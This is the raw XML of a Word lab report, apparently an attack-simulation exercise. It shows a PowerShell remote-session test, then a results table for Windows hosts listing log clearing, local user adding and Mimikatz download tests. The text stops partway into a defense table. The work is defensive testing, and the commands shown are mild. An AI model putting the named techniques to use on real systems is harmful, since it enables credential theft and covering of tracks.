        <w:t>).Value)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A088980" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="0031379D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3F01B7" w14:textId="22BD0F81" w:rsidR="00405469" w:rsidRPr="0031379D" w:rsidRDefault="00405469" w:rsidP="0031379D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Test </w:t>
      </w:r>
      <w:r w:rsidR="3F0F72A7" w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - PowerShell Session Creation and Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24944862" w14:textId="5BBE8BB0" w:rsidR="00405469" w:rsidRPr="00CA7FE4" w:rsidRDefault="00405469" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect to a remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA5ECB2" w14:textId="1122B77E" w:rsidR="00405469" w:rsidRPr="00CA7FE4" w:rsidRDefault="00405469" w:rsidP="00405469">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE6060E" w14:textId="600C820E" w:rsidR="00405469" w:rsidRPr="00CA7FE4" w:rsidRDefault="00405469" w:rsidP="00405469">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174EADA0" w14:textId="53FFD9DB" w:rsidR="00405469" w:rsidRPr="00CA7FE4" w:rsidRDefault="00405469" w:rsidP="00405469">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Run command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976AB06" w14:textId="77777777" w:rsidR="00405469" w:rsidRPr="00CA7FE4" w:rsidRDefault="00405469" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        <w:ind w:left="72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New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PSSession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rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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c"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>#{hostname_to_connect}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C0681" w14:textId="77777777" w:rsidR="00405469" w:rsidRPr="00CA7FE4" w:rsidRDefault="00405469" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        <w:ind w:left="72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Test-Connection</w:t>
      </w:r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smi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-smi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>COMPUTERNAME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0EE2707D" w14:textId="604FBE0D" w:rsidR="00405469" w:rsidRPr="00CA7FE4" w:rsidRDefault="00405469" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        <w:ind w:left="72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Set-Content</w:t>
      </w:r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rFonts w:eastAsiaTheme="majorEastAsia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 xml:space="preserve">Path </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-smi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-smi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TEMP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\T10</w:t>
      </w:r>
      <w:r w:rsidR="004C34B1">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">_PowerShell_Session_Creation_and_Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia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 xml:space="preserve">Value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-pds"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"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>T10</w:t>
      </w:r>
      <w:r w:rsidR="004C34B1">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell Session Creation and Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-pds"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200214EC" w14:textId="62142B54" w:rsidR="00405469" w:rsidRPr="00CA7FE4" w:rsidRDefault="00405469" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        <w:ind w:left="72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Get-Content</w:t>
      </w:r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rFonts w:eastAsiaTheme="majorEastAsia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 xml:space="preserve">Path </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-smi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-smi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TEMP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\T10</w:t>
      </w:r>
      <w:r w:rsidR="004C34B1">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>_PowerShell_Session_Creation_and_Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D4FB7" w14:textId="2E3D4354" w:rsidR="205F5C7F" w:rsidRPr="0031379D" w:rsidRDefault="00405469" w:rsidP="0031379D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remove-Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Force </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-smi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-c1"/>
          <w:color w:val="005CC5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-smi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TEMP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\T10</w:t>
      </w:r>
      <w:r w:rsidR="004C34B1">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>_PowerShell_Session_Creation_and_Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1293FEAE" w14:textId="77777777" w:rsidR="00CA7FE4" w:rsidRDefault="00CA7F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6785B31" w14:textId="0D83C11C" w:rsidR="26E7BB5C" w:rsidRDefault="26E7BB5C" w:rsidP="205F5C7F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attack Results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E1FDDF" w14:textId="0EBEA272" w:rsidR="205F5C7F" w:rsidRDefault="205F5C7F" w:rsidP="205F5C7F"/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3438"/>
        <w:gridCol w:w="2610"/>
        <w:gridCol w:w="2430"/>
        <w:gridCol w:w="2322"/>
      </w:tblGrid>
      <w:tr w:rsidR="205F5C7F" w14:paraId="6DB62454" w14:textId="77777777" w:rsidTr="0031379D">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="9CC2E5" w:themeFill="accent1" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="11A0DB92" w14:textId="73BDF6A2" w:rsidR="204CAE12" w:rsidRDefault="204CAE12" w:rsidP="205F5C7F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="205F5C7F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Attack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4B613899" w14:textId="448FD1D6" w:rsidR="205F5C7F" w:rsidRDefault="00CA7FE4" w:rsidP="0031379D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Internal Windows Server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14:paraId="6C67B407" w14:textId="4E264220" w:rsidR="614F35A3" w:rsidRDefault="00CA7FE4" w:rsidP="46E19D5C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>DMZ Windows Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="9CC2E5" w:themeFill="accent1" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="153BCC56" w14:textId="2CC3A529" w:rsidR="6AFA5147" w:rsidRDefault="00CA7FE4" w:rsidP="46E19D5C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Windows Desktop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="205F5C7F" w14:paraId="1E6046F6" w14:textId="77777777" w:rsidTr="0031379D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="758BFDD5" w14:textId="5BD34877" w:rsidR="204CAE12" w:rsidRDefault="204CAE12" w:rsidP="205F5C7F">
            <w:r>
              <w:t xml:space="preserve">PS Add Local User  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49DAFD99" w14:textId="4A70E626" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t>Failed User Add</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1033DE4C" w14:textId="571D32C3" w:rsidR="205F5C7F" w:rsidRDefault="205F5C7F" w:rsidP="205F5C7F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49F930FF" w14:textId="3485A4A8" w:rsidR="7926D1C2" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t>Failed User Add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31735190" w14:textId="1E5CDEAA" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t>Succeeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="205F5C7F" w14:paraId="121CB83C" w14:textId="77777777" w:rsidTr="0031379D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A5D5225" w14:textId="6C0DD565" w:rsidR="205F5C7F" w:rsidRDefault="204CAE12" w:rsidP="205F5C7F">
            <w:r>
              <w:t xml:space="preserve">PS Clear Event Log of Security Events  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AE8CCE4" w14:textId="6AF86184" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t xml:space="preserve">Succeeded </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1213BB75" w14:textId="0A9DF749" w:rsidR="61DEDF05" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t>Succeeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BACC11C" w14:textId="3434C49C" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t xml:space="preserve">Succeeded </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="205F5C7F" w14:paraId="486C9D88" w14:textId="77777777" w:rsidTr="0031379D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D29D66D" w14:textId="72896559" w:rsidR="204CAE12" w:rsidRDefault="204CAE12" w:rsidP="205F5C7F">
            <w:r>
              <w:t xml:space="preserve">PS Invoke </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ABA75E6" w14:textId="3E08B2BC" w:rsidR="204CAE12" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> from Remote Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42BC4347" w14:textId="1102B2ED" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="0031379D">
            <w:r>
              <w:t>Failed Download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="743A8218" w14:textId="4516A8D1" w:rsidR="7A603BC0" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t>Failed Download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="771AC583" w14:textId="05A81CD4" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="0031379D">
            <w:r>
              <w:t>Failed Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="205F5C7F" w14:paraId="0FEFD2AC" w14:textId="77777777" w:rsidTr="0031379D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1701576D" w14:textId="77777777" w:rsidR="205F5C7F" w:rsidRDefault="204CAE12" w:rsidP="205F5C7F">
            <w:r>
              <w:t>PS Obfuscation Tests.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10AECC27" w14:textId="69C072CF" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="205F5C7F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="035FC8CA" w14:textId="4EE2E4FB" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t xml:space="preserve">Failed Download </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="066E492C" w14:textId="0B9C734A" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t xml:space="preserve">Failed Download </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B03223D" w14:textId="089886BB" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t xml:space="preserve">Succeeded </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="205F5C7F" w14:paraId="10CC91AF" w14:textId="77777777" w:rsidTr="0031379D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6459CD47" w14:textId="7EBA7806" w:rsidR="204CAE12" w:rsidRDefault="204CAE12" w:rsidP="205F5C7F">
            <w:r>
              <w:t>PS Session Creation and Use.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="353C6D51" w14:textId="195BB838" w:rsidR="205F5C7F" w:rsidRDefault="205F5C7F" w:rsidP="205F5C7F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="588743ED" w14:textId="511F0108" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t>Succeeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15C59EF1" w14:textId="5C1D33A8" w:rsidR="6880815D" w:rsidRDefault="0031379D" w:rsidP="205F5C7F">
            <w:r>
              <w:t>Succeeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44569B12" w14:textId="7C4B33C4" w:rsidR="205F5C7F" w:rsidRDefault="0031379D" w:rsidP="0031379D">
            <w:r>
              <w:t xml:space="preserve">Failed Connection </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C331CBD" w14:textId="22653A91" w:rsidR="205F5C7F" w:rsidRDefault="205F5C7F" w:rsidP="205F5C7F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B43FCC" w14:textId="2C9FA273" w:rsidR="26E7BB5C" w:rsidRDefault="26E7BB5C" w:rsidP="205F5C7F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Defense Results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062CFB92" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="0031379D"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10800" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3438"/>
        <w:gridCol w:w="2610"/>
        <w:gridCol w:w="2430"/>
        <w:gridCol w:w="2322"/>
      </w:tblGrid>
      <w:tr w:rsidR="0031379D" w14:paraId="3CEA5288" w14:textId="77777777" w:rsidTr="0031379D">
        <w:trPr>
          <w:trHeight w:val="350"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="9CC2E5" w:themeFill="accent1" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="06BBBAD4" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="205F5C7F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
